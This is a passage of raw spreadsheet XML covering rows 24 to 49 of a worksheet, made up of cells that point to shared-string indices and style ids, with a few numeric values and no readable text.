      <c r="B24" s="67" t="s">
        <v>171</v>
      </c>
      <c r="C24" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D24" s="45" t="s">
        <v>229</v>
      </c>
      <c r="E24" s="45" t="s">
        <v>230</v>
      </c>
      <c r="F24" s="45" t="s">
        <v>98</v>
      </c>
      <c r="G24" s="45" t="s">
        <v>238</v>
      </c>
      <c r="H24" s="46" t="s">
        <v>239</v>
      </c>
      <c r="I24" s="46" t="s">
        <v>240</v>
      </c>
      <c r="J24" s="46" t="s">
        <v>241</v>
      </c>
      <c r="K24" s="47">
        <v>1.0</v>
      </c>
      <c r="L24" s="47">
        <v>0.0</v>
      </c>
      <c r="M24" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N24" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O24" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P24" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q24" s="208"/>
      <c r="R24" s="208"/>
      <c r="S24" s="208"/>
      <c r="T24" s="208"/>
      <c r="U24" s="208"/>
      <c r="V24" s="208"/>
    </row>
    <row r="25" ht="90.0" customHeight="1">
      <c r="B25" s="67" t="s">
        <v>171</v>
      </c>
      <c r="C25" s="45" t="s">
        <v>244</v>
      </c>
      <c r="D25" s="45" t="s">
        <v>245</v>
      </c>
      <c r="E25" s="45" t="s">
        <v>246</v>
      </c>
      <c r="F25" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G25" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H25" s="46" t="s">
        <v>247</v>
      </c>
      <c r="I25" s="46" t="s">
        <v>248</v>
      </c>
      <c r="J25" s="46" t="s">
        <v>249</v>
      </c>
      <c r="K25" s="47">
        <v>1.0</v>
      </c>
      <c r="L25" s="47">
        <v>0.0</v>
      </c>
      <c r="M25" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N25" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O25" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P25" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q25" s="208"/>
      <c r="R25" s="208"/>
      <c r="S25" s="208"/>
      <c r="T25" s="208"/>
      <c r="U25" s="208"/>
      <c r="V25" s="208"/>
    </row>
    <row r="26" ht="90.0" customHeight="1">
      <c r="B26" s="67" t="s">
        <v>171</v>
      </c>
      <c r="C26" s="45" t="s">
        <v>244</v>
      </c>
      <c r="D26" s="45" t="s">
        <v>245</v>
      </c>
      <c r="E26" s="45" t="s">
        <v>246</v>
      </c>
      <c r="F26" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G26" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H26" s="46" t="s">
        <v>255</v>
      </c>
      <c r="I26" s="46" t="s">
        <v>256</v>
      </c>
      <c r="J26" s="46" t="s">
        <v>257</v>
      </c>
      <c r="K26" s="47">
        <v>1.0</v>
      </c>
      <c r="L26" s="47">
        <v>0.0</v>
      </c>
      <c r="M26" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N26" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O26" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P26" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q26" s="208"/>
      <c r="R26" s="208"/>
      <c r="S26" s="208"/>
      <c r="T26" s="208"/>
      <c r="U26" s="208"/>
      <c r="V26" s="208"/>
    </row>
    <row r="27" ht="90.0" customHeight="1">
      <c r="B27" s="67" t="s">
        <v>171</v>
      </c>
      <c r="C27" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D27" s="45" t="s">
        <v>261</v>
      </c>
      <c r="E27" s="45" t="s">
        <v>262</v>
      </c>
      <c r="F27" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G27" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H27" s="46" t="s">
        <v>263</v>
      </c>
      <c r="I27" s="46" t="s">
        <v>264</v>
      </c>
      <c r="J27" s="46" t="s">
        <v>265</v>
      </c>
      <c r="K27" s="47">
        <v>1.0</v>
      </c>
      <c r="L27" s="47">
        <v>0.0</v>
      </c>
      <c r="M27" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N27" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O27" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P27" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q27" s="208"/>
      <c r="R27" s="208"/>
      <c r="S27" s="208"/>
      <c r="T27" s="208"/>
      <c r="U27" s="208"/>
      <c r="V27" s="208"/>
    </row>
    <row r="28" ht="90.0" customHeight="1">
      <c r="B28" s="67" t="s">
        <v>172</v>
      </c>
      <c r="C28" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D28" s="45" t="s">
        <v>274</v>
      </c>
      <c r="E28" s="45" t="s">
        <v>275</v>
      </c>
      <c r="F28" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G28" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H28" s="46" t="s">
        <v>276</v>
      </c>
      <c r="I28" s="65" t="s">
        <v>277</v>
      </c>
      <c r="J28" s="46" t="s">
        <v>278</v>
      </c>
      <c r="K28" s="47">
        <v>1.0</v>
      </c>
      <c r="L28" s="47">
        <v>0.0</v>
      </c>
      <c r="M28" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N28" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O28" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P28" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q28" s="208"/>
      <c r="R28" s="208"/>
      <c r="S28" s="208"/>
      <c r="T28" s="208"/>
      <c r="U28" s="208"/>
      <c r="V28" s="208"/>
    </row>
    <row r="29" ht="90.0" customHeight="1">
      <c r="B29" s="44" t="s">
        <v>172</v>
      </c>
      <c r="C29" s="45" t="s">
        <v>284</v>
      </c>
      <c r="D29" s="45" t="s">
        <v>285</v>
      </c>
      <c r="E29" s="45" t="s">
        <v>286</v>
      </c>
      <c r="F29" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G29" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H29" s="46" t="s">
        <v>287</v>
      </c>
      <c r="I29" s="46" t="s">
        <v>288</v>
      </c>
      <c r="J29" s="46" t="s">
        <v>289</v>
      </c>
      <c r="K29" s="47">
        <v>1.0</v>
      </c>
      <c r="L29" s="47">
        <v>0.0</v>
      </c>
      <c r="M29" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N29" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O29" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P29" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q29" s="208"/>
      <c r="R29" s="208"/>
      <c r="S29" s="208"/>
      <c r="T29" s="208"/>
      <c r="U29" s="208"/>
      <c r="V29" s="208"/>
    </row>
    <row r="30" ht="90.0" customHeight="1">
      <c r="B30" s="44" t="s">
        <v>172</v>
      </c>
      <c r="C30" s="45" t="s">
        <v>284</v>
      </c>
      <c r="D30" s="45" t="s">
        <v>293</v>
      </c>
      <c r="E30" s="45" t="s">
        <v>294</v>
      </c>
      <c r="F30" s="45" t="s">
        <v>295</v>
      </c>
      <c r="G30" s="45" t="s">
        <v>296</v>
      </c>
      <c r="H30" s="46" t="s">
        <v>297</v>
      </c>
      <c r="I30" s="46" t="s">
        <v>298</v>
      </c>
      <c r="J30" s="46" t="s">
        <v>299</v>
      </c>
      <c r="K30" s="47">
        <v>1.0</v>
      </c>
      <c r="L30" s="47">
        <v>0.0</v>
      </c>
      <c r="M30" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N30" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O30" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P30" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q30" s="208"/>
      <c r="R30" s="208"/>
      <c r="S30" s="208"/>
      <c r="T30" s="208"/>
      <c r="U30" s="208"/>
      <c r="V30" s="208"/>
    </row>
    <row r="31" ht="90.0" customHeight="1">
      <c r="B31" s="44" t="s">
        <v>172</v>
      </c>
      <c r="C31" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D31" s="45" t="s">
        <v>306</v>
      </c>
      <c r="E31" s="45" t="s">
        <v>307</v>
      </c>
      <c r="F31" s="45" t="s">
        <v>308</v>
      </c>
      <c r="G31" s="45" t="s">
        <v>309</v>
      </c>
      <c r="H31" s="46" t="s">
        <v>188</v>
      </c>
      <c r="I31" s="46" t="s">
        <v>310</v>
      </c>
      <c r="J31" s="46" t="s">
        <v>311</v>
      </c>
      <c r="K31" s="47">
        <v>1.0</v>
      </c>
      <c r="L31" s="47">
        <v>0.0</v>
      </c>
      <c r="M31" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N31" s="207">
        <v>15621.0</v>
      </c>
      <c r="O31" s="207">
        <v>1.0</v>
      </c>
      <c r="P31" s="207">
        <v>1.0</v>
      </c>
      <c r="Q31" s="208"/>
      <c r="R31" s="208"/>
      <c r="S31" s="208"/>
      <c r="T31" s="208"/>
      <c r="U31" s="208"/>
      <c r="V31" s="208"/>
    </row>
    <row r="32" ht="90.0" customHeight="1">
      <c r="B32" s="44" t="s">
        <v>172</v>
      </c>
      <c r="C32" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D32" s="45" t="s">
        <v>306</v>
      </c>
      <c r="E32" s="45" t="s">
        <v>307</v>
      </c>
      <c r="F32" s="55" t="s">
        <v>320</v>
      </c>
      <c r="G32" s="45" t="s">
        <v>321</v>
      </c>
      <c r="H32" s="46" t="s">
        <v>322</v>
      </c>
      <c r="I32" s="46" t="s">
        <v>323</v>
      </c>
      <c r="J32" s="46" t="s">
        <v>324</v>
      </c>
      <c r="K32" s="47">
        <v>1.0</v>
      </c>
      <c r="L32" s="47">
        <v>0.0</v>
      </c>
      <c r="M32" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N32" s="207" t="s">
        <v>1252</v>
      </c>
      <c r="O32" s="207" t="s">
        <v>1252</v>
      </c>
      <c r="P32" s="207" t="s">
        <v>1252</v>
      </c>
      <c r="Q32" s="208"/>
      <c r="R32" s="208"/>
      <c r="S32" s="208"/>
      <c r="T32" s="208"/>
      <c r="U32" s="208"/>
      <c r="V32" s="208"/>
    </row>
    <row r="33" ht="90.0" customHeight="1">
      <c r="B33" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C33" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D33" s="45" t="s">
        <v>331</v>
      </c>
      <c r="E33" s="45" t="s">
        <v>332</v>
      </c>
      <c r="F33" s="45" t="s">
        <v>333</v>
      </c>
      <c r="G33" s="45" t="s">
        <v>334</v>
      </c>
      <c r="H33" s="46" t="s">
        <v>335</v>
      </c>
      <c r="I33" s="46" t="s">
        <v>125</v>
      </c>
      <c r="J33" s="46" t="s">
        <v>336</v>
      </c>
      <c r="K33" s="47">
        <v>1.0</v>
      </c>
      <c r="L33" s="47">
        <v>0.0</v>
      </c>
      <c r="M33" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N33" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O33" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P33" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q33" s="208"/>
      <c r="R33" s="208"/>
      <c r="S33" s="208"/>
      <c r="T33" s="208"/>
      <c r="U33" s="208"/>
      <c r="V33" s="208"/>
    </row>
    <row r="34" ht="90.0" customHeight="1">
      <c r="B34" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C34" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D34" s="45" t="s">
        <v>331</v>
      </c>
      <c r="E34" s="45" t="s">
        <v>332</v>
      </c>
      <c r="F34" s="45" t="s">
        <v>333</v>
      </c>
      <c r="G34" s="45" t="s">
        <v>334</v>
      </c>
      <c r="H34" s="46" t="s">
        <v>335</v>
      </c>
      <c r="I34" s="46" t="s">
        <v>340</v>
      </c>
      <c r="J34" s="46" t="s">
        <v>341</v>
      </c>
      <c r="K34" s="47">
        <v>1.0</v>
      </c>
      <c r="L34" s="47">
        <v>0.0</v>
      </c>
      <c r="M34" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N34" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O34" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P34" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q34" s="208"/>
      <c r="R34" s="208"/>
      <c r="S34" s="208"/>
      <c r="T34" s="208"/>
      <c r="U34" s="208"/>
      <c r="V34" s="208"/>
    </row>
    <row r="35" ht="90.0" customHeight="1">
      <c r="B35" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C35" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D35" s="45" t="s">
        <v>331</v>
      </c>
      <c r="E35" s="45" t="s">
        <v>332</v>
      </c>
      <c r="F35" s="45" t="s">
        <v>333</v>
      </c>
      <c r="G35" s="45" t="s">
        <v>334</v>
      </c>
      <c r="H35" s="46" t="s">
        <v>335</v>
      </c>
      <c r="I35" s="46" t="s">
        <v>343</v>
      </c>
      <c r="J35" s="46" t="s">
        <v>344</v>
      </c>
      <c r="K35" s="47">
        <v>1.0</v>
      </c>
      <c r="L35" s="47">
        <v>0.0</v>
      </c>
      <c r="M35" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N35" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O35" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P35" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q35" s="208"/>
      <c r="R35" s="208"/>
      <c r="S35" s="208"/>
      <c r="T35" s="208"/>
      <c r="U35" s="208"/>
      <c r="V35" s="208"/>
    </row>
    <row r="36" ht="90.0" customHeight="1">
      <c r="B36" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C36" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D36" s="45" t="s">
        <v>331</v>
      </c>
      <c r="E36" s="45" t="s">
        <v>332</v>
      </c>
      <c r="F36" s="45" t="s">
        <v>333</v>
      </c>
      <c r="G36" s="45" t="s">
        <v>334</v>
      </c>
      <c r="H36" s="46" t="s">
        <v>348</v>
      </c>
      <c r="I36" s="46" t="s">
        <v>349</v>
      </c>
      <c r="J36" s="46" t="s">
        <v>350</v>
      </c>
      <c r="K36" s="47">
        <v>1.0</v>
      </c>
      <c r="L36" s="47">
        <v>0.0</v>
      </c>
      <c r="M36" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N36" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O36" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P36" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q36" s="208"/>
      <c r="R36" s="208"/>
      <c r="S36" s="208"/>
      <c r="T36" s="208"/>
      <c r="U36" s="208"/>
      <c r="V36" s="208"/>
    </row>
    <row r="37" ht="90.0" customHeight="1">
      <c r="B37" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C37" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D37" s="45" t="s">
        <v>331</v>
      </c>
      <c r="E37" s="45" t="s">
        <v>332</v>
      </c>
      <c r="F37" s="45" t="s">
        <v>354</v>
      </c>
      <c r="G37" s="45" t="s">
        <v>355</v>
      </c>
      <c r="H37" s="46" t="s">
        <v>356</v>
      </c>
      <c r="I37" s="46" t="s">
        <v>357</v>
      </c>
      <c r="J37" s="46" t="s">
        <v>358</v>
      </c>
      <c r="K37" s="47">
        <v>1.0</v>
      </c>
      <c r="L37" s="47">
        <v>0.0</v>
      </c>
      <c r="M37" s="47" t="s">
        <v>1253</v>
      </c>
      <c r="N37" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O37" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P37" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q37" s="208"/>
      <c r="R37" s="208"/>
      <c r="S37" s="208"/>
      <c r="T37" s="208"/>
      <c r="U37" s="208"/>
      <c r="V37" s="208"/>
    </row>
    <row r="38" ht="90.0" customHeight="1">
      <c r="B38" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C38" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D38" s="45" t="s">
        <v>331</v>
      </c>
      <c r="E38" s="45" t="s">
        <v>332</v>
      </c>
      <c r="F38" s="45" t="s">
        <v>362</v>
      </c>
      <c r="G38" s="45" t="s">
        <v>363</v>
      </c>
      <c r="H38" s="46" t="s">
        <v>364</v>
      </c>
      <c r="I38" s="46" t="s">
        <v>365</v>
      </c>
      <c r="J38" s="46" t="s">
        <v>366</v>
      </c>
      <c r="K38" s="47">
        <v>1.0</v>
      </c>
      <c r="L38" s="47">
        <v>0.0</v>
      </c>
      <c r="M38" s="47" t="s">
        <v>1253</v>
      </c>
      <c r="N38" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O38" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P38" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q38" s="208"/>
      <c r="R38" s="208"/>
      <c r="S38" s="208"/>
      <c r="T38" s="208"/>
      <c r="U38" s="208"/>
      <c r="V38" s="208"/>
    </row>
    <row r="39" ht="90.0" customHeight="1">
      <c r="B39" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C39" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D39" s="45" t="s">
        <v>331</v>
      </c>
      <c r="E39" s="45" t="s">
        <v>332</v>
      </c>
      <c r="F39" s="45" t="s">
        <v>362</v>
      </c>
      <c r="G39" s="45" t="s">
        <v>363</v>
      </c>
      <c r="H39" s="46" t="s">
        <v>369</v>
      </c>
      <c r="I39" s="46" t="s">
        <v>256</v>
      </c>
      <c r="J39" s="46" t="s">
        <v>370</v>
      </c>
      <c r="K39" s="47">
        <v>1.0</v>
      </c>
      <c r="L39" s="47">
        <v>0.0</v>
      </c>
      <c r="M39" s="47" t="s">
        <v>1253</v>
      </c>
      <c r="N39" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O39" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P39" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q39" s="208"/>
      <c r="R39" s="208"/>
      <c r="S39" s="208"/>
      <c r="T39" s="208"/>
      <c r="U39" s="208"/>
      <c r="V39" s="208"/>
    </row>
    <row r="40" ht="90.0" customHeight="1">
      <c r="B40" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C40" s="45" t="s">
        <v>373</v>
      </c>
      <c r="D40" s="45" t="s">
        <v>374</v>
      </c>
      <c r="E40" s="45" t="s">
        <v>375</v>
      </c>
      <c r="F40" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G40" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H40" s="46" t="s">
        <v>376</v>
      </c>
      <c r="I40" s="46" t="s">
        <v>256</v>
      </c>
      <c r="J40" s="46" t="s">
        <v>377</v>
      </c>
      <c r="K40" s="47">
        <v>1.0</v>
      </c>
      <c r="L40" s="47">
        <v>0.0</v>
      </c>
      <c r="M40" s="47" t="s">
        <v>1253</v>
      </c>
      <c r="N40" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O40" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P40" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q40" s="208"/>
      <c r="R40" s="208"/>
      <c r="S40" s="208"/>
      <c r="T40" s="208"/>
      <c r="U40" s="208"/>
      <c r="V40" s="208"/>
    </row>
    <row r="41" ht="90.0" customHeight="1">
      <c r="B41" s="44" t="s">
        <v>381</v>
      </c>
      <c r="C41" s="45" t="s">
        <v>373</v>
      </c>
      <c r="D41" s="45" t="s">
        <v>374</v>
      </c>
      <c r="E41" s="45" t="s">
        <v>375</v>
      </c>
      <c r="F41" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G41" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H41" s="46" t="s">
        <v>382</v>
      </c>
      <c r="I41" s="46" t="s">
        <v>256</v>
      </c>
      <c r="J41" s="46" t="s">
        <v>383</v>
      </c>
      <c r="K41" s="47">
        <v>1.0</v>
      </c>
      <c r="L41" s="47">
        <v>0.0</v>
      </c>
      <c r="M41" s="47" t="s">
        <v>1253</v>
      </c>
      <c r="N41" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O41" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P41" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q41" s="208"/>
      <c r="R41" s="208"/>
      <c r="S41" s="208"/>
      <c r="T41" s="208"/>
      <c r="U41" s="208"/>
      <c r="V41" s="208"/>
    </row>
    <row r="42" ht="90.0" customHeight="1">
      <c r="B42" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C42" s="45" t="s">
        <v>373</v>
      </c>
      <c r="D42" s="45" t="s">
        <v>374</v>
      </c>
      <c r="E42" s="45" t="s">
        <v>375</v>
      </c>
      <c r="F42" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G42" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H42" s="46" t="s">
        <v>386</v>
      </c>
      <c r="I42" s="46" t="s">
        <v>256</v>
      </c>
      <c r="J42" s="46" t="s">
        <v>387</v>
      </c>
      <c r="K42" s="47">
        <v>1.0</v>
      </c>
      <c r="L42" s="47">
        <v>0.0</v>
      </c>
      <c r="M42" s="47" t="s">
        <v>1253</v>
      </c>
      <c r="N42" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O42" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P42" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q42" s="208"/>
      <c r="R42" s="208"/>
      <c r="S42" s="208"/>
      <c r="T42" s="208"/>
      <c r="U42" s="208"/>
      <c r="V42" s="208"/>
    </row>
    <row r="43" ht="90.0" customHeight="1">
      <c r="B43" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C43" s="45" t="s">
        <v>373</v>
      </c>
      <c r="D43" s="45" t="s">
        <v>374</v>
      </c>
      <c r="E43" s="45" t="s">
        <v>375</v>
      </c>
      <c r="F43" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G43" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H43" s="46" t="s">
        <v>390</v>
      </c>
      <c r="I43" s="46" t="s">
        <v>256</v>
      </c>
      <c r="J43" s="46" t="s">
        <v>391</v>
      </c>
      <c r="K43" s="47">
        <v>1.0</v>
      </c>
      <c r="L43" s="47">
        <v>0.0</v>
      </c>
      <c r="M43" s="47" t="s">
        <v>1253</v>
      </c>
      <c r="N43" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O43" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P43" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q43" s="208"/>
      <c r="R43" s="208"/>
      <c r="S43" s="208"/>
      <c r="T43" s="208"/>
      <c r="U43" s="208"/>
      <c r="V43" s="208"/>
    </row>
    <row r="44" ht="90.0" customHeight="1">
      <c r="B44" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C44" s="45" t="s">
        <v>397</v>
      </c>
      <c r="D44" s="45" t="s">
        <v>398</v>
      </c>
      <c r="E44" s="45" t="s">
        <v>399</v>
      </c>
      <c r="F44" s="55" t="s">
        <v>400</v>
      </c>
      <c r="G44" s="45" t="s">
        <v>401</v>
      </c>
      <c r="H44" s="46" t="s">
        <v>402</v>
      </c>
      <c r="I44" s="46" t="s">
        <v>403</v>
      </c>
      <c r="J44" s="46" t="s">
        <v>404</v>
      </c>
      <c r="K44" s="47">
        <v>1.0</v>
      </c>
      <c r="L44" s="47">
        <v>0.0</v>
      </c>
      <c r="M44" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N44" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O44" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P44" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q44" s="208"/>
      <c r="R44" s="208"/>
      <c r="S44" s="208"/>
      <c r="T44" s="208"/>
      <c r="U44" s="208"/>
      <c r="V44" s="208"/>
    </row>
    <row r="45" ht="90.0" customHeight="1">
      <c r="B45" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C45" s="45" t="s">
        <v>397</v>
      </c>
      <c r="D45" s="45" t="s">
        <v>398</v>
      </c>
      <c r="E45" s="45" t="s">
        <v>399</v>
      </c>
      <c r="F45" s="55" t="s">
        <v>400</v>
      </c>
      <c r="G45" s="45" t="s">
        <v>401</v>
      </c>
      <c r="H45" s="46" t="s">
        <v>402</v>
      </c>
      <c r="I45" s="46" t="s">
        <v>323</v>
      </c>
      <c r="J45" s="46" t="s">
        <v>409</v>
      </c>
      <c r="K45" s="47">
        <v>1.0</v>
      </c>
      <c r="L45" s="47">
        <v>0.0</v>
      </c>
      <c r="M45" s="47" t="s">
        <v>1253</v>
      </c>
      <c r="N45" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O45" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P45" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q45" s="208"/>
      <c r="R45" s="208"/>
      <c r="S45" s="208"/>
      <c r="T45" s="208"/>
      <c r="U45" s="208"/>
      <c r="V45" s="208"/>
    </row>
    <row r="46" ht="90.0" customHeight="1">
      <c r="B46" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C46" s="45" t="s">
        <v>397</v>
      </c>
      <c r="D46" s="45" t="s">
        <v>398</v>
      </c>
      <c r="E46" s="45" t="s">
        <v>399</v>
      </c>
      <c r="F46" s="55" t="s">
        <v>400</v>
      </c>
      <c r="G46" s="45" t="s">
        <v>401</v>
      </c>
      <c r="H46" s="46" t="s">
        <v>413</v>
      </c>
      <c r="I46" s="46" t="s">
        <v>414</v>
      </c>
      <c r="J46" s="46" t="s">
        <v>415</v>
      </c>
      <c r="K46" s="47">
        <v>1.0</v>
      </c>
      <c r="L46" s="47">
        <v>0.0</v>
      </c>
      <c r="M46" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N46" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O46" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P46" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q46" s="208"/>
      <c r="R46" s="208"/>
      <c r="S46" s="208"/>
      <c r="T46" s="208"/>
      <c r="U46" s="208"/>
      <c r="V46" s="208"/>
    </row>
    <row r="47" ht="90.0" customHeight="1">
      <c r="B47" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C47" s="45" t="s">
        <v>397</v>
      </c>
      <c r="D47" s="45" t="s">
        <v>398</v>
      </c>
      <c r="E47" s="45" t="s">
        <v>399</v>
      </c>
      <c r="F47" s="55" t="s">
        <v>420</v>
      </c>
      <c r="G47" s="45" t="s">
        <v>421</v>
      </c>
      <c r="H47" s="46" t="s">
        <v>420</v>
      </c>
      <c r="I47" s="46" t="s">
        <v>422</v>
      </c>
      <c r="J47" s="46" t="s">
        <v>423</v>
      </c>
      <c r="K47" s="47">
        <v>1.0</v>
      </c>
      <c r="L47" s="47">
        <v>0.0</v>
      </c>
      <c r="M47" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N47" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O47" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P47" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q47" s="208"/>
      <c r="R47" s="208"/>
      <c r="S47" s="208"/>
      <c r="T47" s="208"/>
      <c r="U47" s="208"/>
      <c r="V47" s="208"/>
    </row>
    <row r="48" ht="90.0" customHeight="1">
      <c r="B48" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C48" s="45" t="s">
        <v>397</v>
      </c>
      <c r="D48" s="45" t="s">
        <v>398</v>
      </c>
      <c r="E48" s="45" t="s">
        <v>399</v>
      </c>
      <c r="F48" s="55" t="s">
        <v>400</v>
      </c>
      <c r="G48" s="45" t="s">
        <v>401</v>
      </c>
      <c r="H48" s="46" t="s">
        <v>429</v>
      </c>
      <c r="I48" s="46" t="s">
        <v>147</v>
      </c>
      <c r="J48" s="46" t="s">
        <v>430</v>
      </c>
      <c r="K48" s="47">
        <v>1.0</v>
      </c>
      <c r="L48" s="47">
        <v>0.0</v>
      </c>
      <c r="M48" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N48" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O48" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P48" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q48" s="208"/>
      <c r="R48" s="208"/>
      <c r="S48" s="208"/>
      <c r="T48" s="208"/>
      <c r="U48" s="208"/>
      <c r="V48" s="208"/>
    </row>
    <row r="49" ht="90.0" customHeight="1">
      <c r="B49" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C49" s="45" t="s">
        <v>397</v>
      </c>
      <c r="D49" s="45" t="s">
        <v>398</v>
      </c>
      <c r="E49" s="45" t="s">
        <v>399</v>
      </c>
      <c r="F49" s="55" t="s">
        <v>10</v>
      </c>
      <c r="G49" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H49" s="46" t="s">
        <v>433</v>
      </c>
      <c r="I49" s="46" t="s">
        <v>434</v>
      </c>
      <c r="J49" s="46" t="s">
        <v>435</v>
      </c>
      <c r="K49" s="47">
        <v>1.0</v>
      </c>
      <c r="L49" s="47">
        <v>0.0</v>
      </c>
      <c r="M49" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N49" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O49" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P49" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q49" s="208"/>
      <c r="R49" s="208"/>
      <c r="S49" s="208"/>
